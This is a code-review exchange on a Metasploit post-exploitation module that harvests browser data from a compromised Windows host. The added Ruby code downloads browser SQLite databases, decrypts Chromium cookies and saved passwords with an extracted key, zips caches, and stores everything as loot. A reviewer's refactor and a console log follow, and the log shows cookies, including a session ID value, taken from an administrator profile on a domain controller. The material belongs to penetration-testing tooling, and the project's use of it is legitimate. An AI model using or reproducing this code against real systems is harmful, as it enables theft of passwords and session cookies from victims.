modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,896 @@
+
+    if file_count > 0
+      temp_dir = session.fs.file.expand_path('%TEMP%')
+      random_name = Rex::Text.rand_text_alpha(8)
+      zip_file_path = "#{temp_dir}\\#{random_name}.zip"
+
+      zip = Rex::Zip::Archive.new
+      progress_interval = (file_count / 10.0).ceil
+
+      files_to_zip.each_with_index do |file, index|
+        file_content = read_file(file)
+        zip.add_file(file, file_content) if file_content
+
+        if (index + 1) % progress_interval == 0 || index == file_count - 1
+          progress_percent = ((index + 1) * 100 / file_count).to_i
+          print_status("Zipping progress: #{progress_percent}% (#{index + 1}/#{file_count} files processed)")
+        end
+      end
+
+      write_file(zip_file_path, zip.pack)
+      print_status("Cache for #{browser} zipped to: #{zip_file_path}")
+
+      browser_clean = browser.gsub('\\', '_').chomp('_')
+      timestamp = Time.now.strftime('%Y%m%d%H%M')
+      ip = session.sock.peerhost
+      cache_local_path = store_loot(
+        "#{browser_clean}_Cache",
+        'application/zip',
+        session,
+        read_file(zip_file_path),
+        "#{timestamp}_#{ip}_#{browser_clean}_Cache.zip",
+        "#{browser_clean} Cache"
+      )
+
+      file_size = ::File.size(cache_local_path)
+      print_good("└ Extracted Cache to #{cache_local_path} (#{file_size} bytes)") if file_size > 2
+
+      session.fs.file.rm(zip_file_path)
+    else
+      print_status("No Cache files found for #{browser}.")
+    end
+  end
+
+  def extract_sql_data(db_path, query, data_type, browser, encryption_key = nil)
+    if file?(db_path)
+      db_local_path = "#{Rex::Text.rand_text_alpha(8, 12)}.db"
+      session.fs.file.download_file(db_local_path, db_path)
+
+      begin
+        db = SQLite3::Database.open(db_local_path)
+        result = db.execute(query)
+
+        if encryption_key
+          result.each do |row|
+            next unless row[-1]
+
+            if data_type == 'Cookies' && row[-1].length >= (IV_SIZE + TAG_SIZE + 3)
+              row[-1] = decrypt_chromium_password(row[-1], encryption_key)
+            elsif data_type == 'Passwords' && row[2].length >= (IV_SIZE + TAG_SIZE + 3)
+              row[2] = decrypt_chromium_password(row[2], encryption_key)
+            end
+          end
+        end
+
+        browser_clean = browser.gsub('\\', '_').chomp('_')
+        timestamp = Time.now.strftime('%Y%m%d%H%M')
+        ip = session.sock.peerhost
+        file_name = store_loot("#{browser_clean}_#{data_type}", 'text/plain', session, result, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.txt", "#{browser_clean} #{data_type.capitalize}")
+        file_size = ::File.size(file_name)
+
+        if file_size > 2
+          print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
+        end
+      ensure
+        db.close
+        ::File.delete(db_local_path) if ::File.exist?(db_local_path)
+      end
+    end
+  end
```

Comment:
What are your thoughts on:

```ruby
  def extract_sql_data(db_path, query, data_type, browser, encryption_key = nil)
    if file?(db_path)
      db_local_path = "#{Rex::Text.rand_text_alpha(8, 12)}.db"
      session.fs.file.download_file(db_local_path, db_path)

      begin
        columns, *result = SQLite3::Database.open(db_local_path) do |db|
          db.execute2(query)
        end

        if encryption_key
          result.each do |row|
            next unless row[-1]

            if data_type == 'Cookies' && row[-1].length >= (IV_SIZE + TAG_SIZE + 3)
              row[-1] = decrypt_chromium_password(row[-1], encryption_key)
            elsif data_type == 'Passwords' && row[2].length >= (IV_SIZE + TAG_SIZE + 3)
              row[2] = decrypt_chromium_password(row[2], encryption_key)
            end
          end
        end

        if result.any?
          browser_clean = browser.gsub('\\', '_').chomp('_')
          timestamp = Time.now.strftime('%Y%m%d%H%M')
          ip = session.sock.peerhost
          result = result.map { |row| columns.zip(row).to_h }
          data = "#{JSON.pretty_generate(result)}\n"
          file_name = store_loot("#{browser_clean}_#{data_type}", 'text/plain', session, data, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.txt", "#{browser_clean} #{data_type.capitalize}")

          print_good("└ #{data_type.capitalize} extracted to #{file_name} (#{result.length} entries)")
        else
          vprint_error("└ #{data_type.capitalize} empty")
        end
      ensure
        ::File.delete(db_local_path) if ::File.exist?(db_local_path)
      end
    end
  end
```

There's a couple of changes here, the output would look like:

```
msf6 post(windows/gather/enum_browsers) > rerun session=-1 browser_type=gecko
[*] Reloading module...

[*] Targeting: ADF3\administrator (IP: 10.4.232.221)
[*] System Information: DC3 | OS: Windows Server 2016 (10.0 Build 14393). | Arch: x64 | Lang: en_US
[*] Starting data extraction from user profile: C:\Users\Administrator
[*] 
[*] Found Mozilla Firefox (Version: 131.0.3)
[+] └ Cookies extracted to /Users/user/.msf4/loot/20241023223723_default_192.168.123.173_MozillaFirefox__673789.txt (24 entries)
[-] └ Download history empty
[+] └ Keyword search history extracted to /Users/user/.msf4/loot/20241023223728_default_192.168.123.173_MozillaFirefox__762759.txt (2 entries)
[+] └ Browsing history extracted to /Users/user/.msf4/loot/20241023223732_default_192.168.123.173_MozillaFirefox__419968.txt (9 entries)
[+] └ Bookmarks extracted to /Users/user/.msf4/loot/20241023223737_default_192.168.123.173_MozillaFirefox__584224.txt (4 entries)
[-] Cookies not found at C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\\Profiles\b6pqyu60.default\cookies.sqlite
[-] Download History not found at C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\\Profiles\b6pqyu60.default\places.sqlite
[-] Keyword Search History not found at C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\\Profiles\b6pqyu60.default\formhistory.sqlite
[-] Browsing History not found at C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\\Profiles\b6pqyu60.default\places.sqlite
[-] Bookmarks not found at C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\\Profiles\b6pqyu60.default\places.sqlite
[*] Post module execution completed


msf6 post(windows/gather/enum_browsers) > cat /Users/user/.msf4/loot/20241023223723_default_192.168.123.173_MozillaFirefox__673789.txt
[*] exec: cat /Users/user/.msf4/loot/20241023223723_default_192.168.123.173_MozillaFirefox__673789.txt

[
  {
    "host": "support.mozilla.org",
    "name": "session_id",
    "path": "/",
    "value": "ur910benf6lnwugbrs0pc07uzyc0qyxw",
    "expiry": 1732138279
  },
  {
    "host": ".mozilla.org",
    "name": "_ga_2VC139B3XV",
    "path": "/",
    "value": "GS1.1.1729719084.1.0.1729719084.0.0.0",
    "expiry": 1792791084
  },
... etc ...
```

Reply:
Love it! Thanks.